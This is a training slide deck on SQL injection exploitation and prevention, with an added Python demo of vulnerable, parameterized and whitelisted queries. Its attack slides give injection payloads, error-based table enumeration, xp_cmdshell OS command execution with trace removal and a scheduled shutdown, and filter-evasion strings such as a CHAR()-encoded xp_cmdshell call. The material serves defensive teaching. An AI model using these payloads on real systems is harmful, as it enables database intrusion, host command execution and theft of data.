Devouring Security Sqli Exploitation and Prevention

Devouring Security Sqli is an exploitation and prevention presentation that I did a while back. The presentation accompanies a screen recording which could be located at http://vimeo.com/gmaran23



  1. Devouring Security: Sqli Exploitation & Prevention, Part 1 & 2. Marudhamaran Gunasekaran.
      Watch the screen recording of this presentation at:
      Devouring Security – Sql Injection Part 1 – http://vimeo.com/83658524
      Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464
  2. Security: Feeling, Reality, Trade-offs, Wisdom. Ignorance is no excuse.
  3. Disclaimer: Techniques and tools in this presentation should be used or applied on an application only with prior consent of the application's owner. Illegal otherwise.
  4. Sqli – Media coverage: http://pastebin.com/HUjZPaF3
  5. Sqli – Media coverage: http://thepiratebay.se/torrent/6443601
  6. Sqli – Media coverage: http://www.bloomberg.com/news/2013-01-24/sony-fined-394-000-over-2011-hacker-attack-on-playstation-data.html
  7. Sqli – Media coverage: http://www.eteknix.com/turkish-hackers-claim-to-have-leaked-40000-sony-italy-account-details/
  8. Sqli – Media coverage: http://news.techworld.com/security/3331283/barclays-97-percent-of-data-breaches-still-due-to-sql-injection/
  9. Sqli – Media coverage
  10. Sqli – Why does it exist?
      "Yeah! I can develop/deploy without restrictions, I have full access."
      "Thanks bro! I am your uninvited database administrator now. I own you, and your data. I like them admin rights."
  11. Sqli – Why does it exist?
      Conglomeration of sensitive data: would you keep all your belongings in your home, or would you keep some in your safe deposit box?
      Blindly trusting unsanitized user input: "Over thousands of queries in a moderate- to large-size application, that 2% can result in a handful of SQL injections," Chou says. "All an attacker needs to do is find one of these, and you'll have millions of records stolen and a headline in Dark Reading."
  12. Sqli – Why does it exist?
      • It's not always about a developer knowing better; there are tons and tons of legacy code
      • Remember, DBAs write SQL too
      • No strict access control policies
      • Windows-based/desktop-based applications are directly ported to the web
      • Developers still don't know the complete truths about Sqli
  13. Sqli 101
      ../Products?name=rat
          SELECT 1 FROM Products WHERE ProductName = 'rat'
      ../Products?name=rat' or 1=1 --
          SELECT 1 FROM Products WHERE ProductName = 'rat' or 1=1 -- '
      The comment swallows the closing quote, so the predicate reduces to "... or true" and every row matches.
  14. Sqli 101
      • http://sqli:8020/Sqli/
      • http://localhost/WebGoat/attack?Screen=147&menu=1100&stage=1
  15. Sqli U
  16. Sqli U – http://sqli:8020/Sqli/ProductSearch
  17. Sqli E
  18. Sqli E – http://sqli:8020/SqliErrorRiddle/
  19. Sqli E
      -- table enumerator: CONVERT(INT, name) fails on a non-numeric table name,
      -- and the conversion error message echoes that name back
      SELECT TOP 1 CONVERT(INT, name)
      FROM sys.tables
      WHERE object_id = (
          SELECT TOP 1 object_id
          FROM (SELECT TOP 2 object_id FROM sys.tables ORDER BY object_id) AS TEMP
          ORDER BY object_id DESC
      )
      Enumerating in MySQL is very easy with OFFSET.
  20. ORMs and SPs Loopholes – http://sqli:8020/SqliORM/ProductSearch
  21. It's not an ORM's problem to have you loaded with features
      ALTER PROCEDURE SearchProducts (@Item VARCHAR(100))
      AS
      BEGIN
          DECLARE @query VARCHAR(400)
          -- user input is spliced into the SQL text
          SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%'''
          PRINT @query
          EXEC (@query)
      END
      GO
      -- Execute good
      EXEC SearchProducts 'chai'
      GO
      -- Execute bad
      EXEC SearchProducts 'chai%'' or 1=1--'
      GO
  22. Fixing SP Loopholes
      ALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200))
      AS
      BEGIN
          DECLARE @safequery NVARCHAR(400)
          DECLARE @params NVARCHAR(200)
          -- @param1 is a bound parameter; the wildcards are concatenated to its value at run time
          SET @safequery = N'SELECT * FROM Products WHERE ProductName LIKE ''%'' + @param1 + ''%'''
          SET @params = N'@param1 NVARCHAR(200)';
          EXECUTE sp_executesql @safequery, @params, @param1 = @Item
      END
      GO
      -- Execute bad: the payload is bound as data, not parsed as SQL
      EXEC SearchProductsBetter 'chai%'' or 1=1--'
      GO
  23. Profiling Host OS
      • Privilege misuse and rooting
  24. Profiling Host OS
      -- enable command shell
      EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
      EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
      -- disable command shell
      EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
      EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
  25. Profiling Host OS
      -- play time!
      EXEC xp_cmdshell 'tasklist'
      EXEC master.dbo.xp_cmdshell 'whoami'
      EXEC xp_cmdshell 'netsh advfirewall firewall show rule name=all profile=public'
  26. Profiling Host OS
      -- enumerate and remove trace
      CREATE TABLE tempsz (temp VARCHAR(MAX)); INSERT INTO tempsz EXEC xp_cmdshell 'tasklist'; SELECT * FROM tempsz; DROP TABLE tempsz;
      -- enumerate and leave trace
      CREATE TABLE tempsz (temp VARCHAR(MAX)); INSERT INTO tempsz EXEC xp_cmdshell 'tasklist';
      -- get enumerated information and remove trace
      SELECT temp FROM tempsz; DROP TABLE tempsz;
  27. Profiling Host OS
      -- schedule a shutdown and send a message to the user named maran
      EXEC xp_cmdshell 'shutdown -s -t 6000';
      EXEC xp_cmdshell 'msg maran You will be shut down in 100 minutes'
      -- abort the shutdown and send a message to the user named maran
      EXEC xp_cmdshell 'shutdown -a';
      EXEC xp_cmdshell 'msg maran I have heard your prayer. You are salvaged'
  28. Profiling Host OS
      OSCommand_Run in Oracle does the equivalent of xp_cmdshell in SQL Server.
  29. Sqli T – Just biding time, my friend
  30. Sqli T – Oracle: DBMS_LOCK.sleep; T-SQL: WAITFOR DELAY; MySQL: BENCHMARK
  31. Sqli B – Blind, but I could get by
  32. Sqli B – Blind, not as fast, but I could travel miles
  33. IDS Evasive Techniques
      '485'="485"
      '5'>'1'
      "QSNR"="QSNR"
      REPLACE('SEL/**/CT', '/**/', '')
  34. Blacklist Filter Evasion
      ';exec xP_cMdsheLL 'dir';--
      ';ex/**/ec xp_cmds/**/hell 'dir';-- [old versions]
      ';exec/**/xp_cmdshell/**/'dir';--
      ';Declare @cmd as varchar(3000);Set @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+''''+'d'+'i'+'r'+'''';exec(@cmd);--
  35. Blacklist Filter Evasion
      Declare @cmd as varchar(3000);
      Set @cmd = (CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));
      EXEC(@cmd);--
      -- the CHAR() sequence decodes to: exec master..xp_cmdshell 'dir'
  36. Sqli Exploitation tools
      • Sqlmap
      • sqlninja
      • Safe3SI
      • Enema
      • Havij
      • Pangolin
      • BSQL Hacker
      ... and a lot more
  37. Sqli Exploitation tools – Demonstration
      1. Safe3SI
      2. Enema
      3. Sqlmap
  38. Sqli Feeble Fixes
      Blacklisting is suicide.
      IDSs are not very effective for Sqli.
  39. Feeble Fixes
      Blacklisting (can't filter all possible dangerous inputs, like the ones below):
      "QSNR"="QSNR"
      REPLACE('SEL/**/CT', '/**/', '')
  40. Blacklisting for Death
  41. Blacklisting for Death
  42. Blacklisting for Death
  43. Sqli Prevention
  44. Sqli Prevention
      Exploitation tools, fuzzers, active/passive vulnerability scanners
  45. Core Defense
      Input validation with whitelist, type casting and/or RegEx.
  46. Core Defense
      Validation with RegEx
  47. Core Defense
      CREATE PROCEDURE dbo.doQuery (@id NCHAR(4))
      AS
          DECLARE @query NCHAR(64)
          -- whitelist: exactly four digits, or the query is never built
          IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]'
          BEGIN
              SELECT @query = 'select ccnum from cust where id = ''' + @id + ''''
              EXEC (@query)
          END
          RETURN
      GO
      -- Or, better yet, force an integer parameter (replaces the version above)
      CREATE PROCEDURE dbo.doQuery (@id SMALLINT)
      AS
          SELECT ccnum FROM cust WHERE id = @id
      GO
  48. Core Defense
      Parametrization, a.k.a. prepared statements [refer to your framework for support]
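The following is an added example, not code from the deck or from the http://sqli:8020 demo application; it uses an in-memory SQLite table with constructed product rows as a stand-in for the SQL Server Products table, and the whitelist regex is a hypothetical one chosen for this demo. It carries slides 13, 21 and 22 through in application code and then layers the slide 45-48 defenses on top: the string-concatenated lookup and LIKE search that the 'rat' or 1=1 -- and chai%' or 1=1-- inputs turn into "return everything", the same search with the value bound as a parameter, regex whitelisting, and type casting of an id.

```python
import re
import sqlite3

# Constructed sample catalogue standing in for the deck's Products table
# (names chosen so the slides' 'chai' and 'rat' inputs have something to hit).
SAMPLE_PRODUCTS = [(1, "chai"), (2, "chang"), (3, "rat"), (4, "aniseed syrup")]


def make_db():
    """Return an in-memory SQLite database seeded with SAMPLE_PRODUCTS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ProductID INTEGER PRIMARY KEY, ProductName TEXT)")
    conn.executemany("INSERT INTO Products (ProductID, ProductName) VALUES (?, ?)", SAMPLE_PRODUCTS)
    return conn


DB = make_db()


# Slide 13: equality lookup built by string concatenation.
# "rat' or 1=1 --" closes the literal, ORs in a tautology and comments out the rest.
def lookup_vulnerable(conn, name):
    query = "SELECT ProductName FROM Products WHERE ProductName = '" + name + "'"
    return [row[0] for row in conn.execute(query)]


# Slide 21: LIKE search built the same way as the SearchProducts procedure.
def search_vulnerable(conn, item):
    query = "SELECT ProductName FROM Products WHERE ProductName LIKE '%" + item + "%'"
    return [row[0] for row in conn.execute(query)]


# Slides 22 and 48: the wildcards are added to the *value*, which is bound through a
# placeholder, so the driver never parses user text as SQL (same idea as sp_executesql
# with @param1). Note that '%' and '_' inside the value still act as LIKE wildcards;
# that can over-match, but it cannot change the statement.
def search_parameterized(conn, item):
    query = "SELECT ProductName FROM Products WHERE ProductName LIKE ? ORDER BY ProductID"
    return [row[0] for row in conn.execute(query, ("%" + item + "%",))]


# Slides 45-46: whitelist validation with a regex. Reject anything outside the
# allowed alphabet rather than trying to strip "dangerous" characters (blacklisting).
PRODUCT_NAME_RE = re.compile(r"[A-Za-z0-9 ]{1,40}")  # hypothetical whitelist for this demo


def is_valid_product_name(item):
    return PRODUCT_NAME_RE.fullmatch(item) is not None


# Slide 47: type casting. An integer id cannot carry SQL text at all.
def parse_product_id(raw):
    """Return the id as an int, or None when the input is not a plain integer."""
    try:
        return int(raw)
    except (TypeError, ValueError):
        return None


def lookup_by_id(conn, raw_id):
    product_id = parse_product_id(raw_id)
    if product_id is None:
        return None
    row = conn.execute("SELECT ProductName FROM Products WHERE ProductID = ?", (product_id,)).fetchone()
    return row[0] if row else None


# Defence in depth: validate first (cheap, fails loudly), then bind the value.
def search_hardened(conn, item):
    if not is_valid_product_name(item):
        raise ValueError("rejected: product name contains characters outside the whitelist")
    return search_parameterized(conn, item)


if __name__ == "__main__":
    payload = "chai%' or 1=1--"          # the slide 21 "Execute bad" input
    print("vulnerable search   :", search_vulnerable(DB, payload))      # every row
    print("parameterized search:", search_parameterized(DB, payload))   # no rows
    print("whitelist accepts it:", is_valid_product_name(payload))       # False
    print("id lookups          :", lookup_by_id(DB, "3"), lookup_by_id(DB, "3 or 1=1"))
```

The vulnerable functions are deliberately the shape of the deck's SearchProducts procedure; run the module to watch the slide 21 payload return the whole table, then the parameterized form return nothing.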
  49. Core Defense
      Encrypt data to prevent disclosure when physical database files are stolen.
      1. Encryption does not do a darn thing to protect you from direct Sqli
      2. Encryption only protects you from Sqli-induced attacks
  50. Core Defense
      Database user account audits
      1. Selective privilege principle
      2. Least privilege principle
  51. Code Reviews – Spot and Stop Sqli
  52. Code Reviews – Spot and Stop Sqli
  53. CAT.NET Sqli Scan
  54. CAT.NET Sqli Scan – MicrosoftACECodeAnalysisReport.htm
  55. Netsparker community edition
  56. What now?
      Sqli Cheatsheet: http://ferruh.mavituna.com/sql-injectioncheatsheet-oku
      Dynamic queries in T-SQL: http://www.sommarskog.se/dyn-search2005.html and http://www.sommarskog.se/dyn-search2008.html
  57. End of the world
      Watch the screen recording of this presentation at my vimeo channel:
      Devouring Security – Sql Injection Part 1 – http://vimeo.com/83658524
      Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464
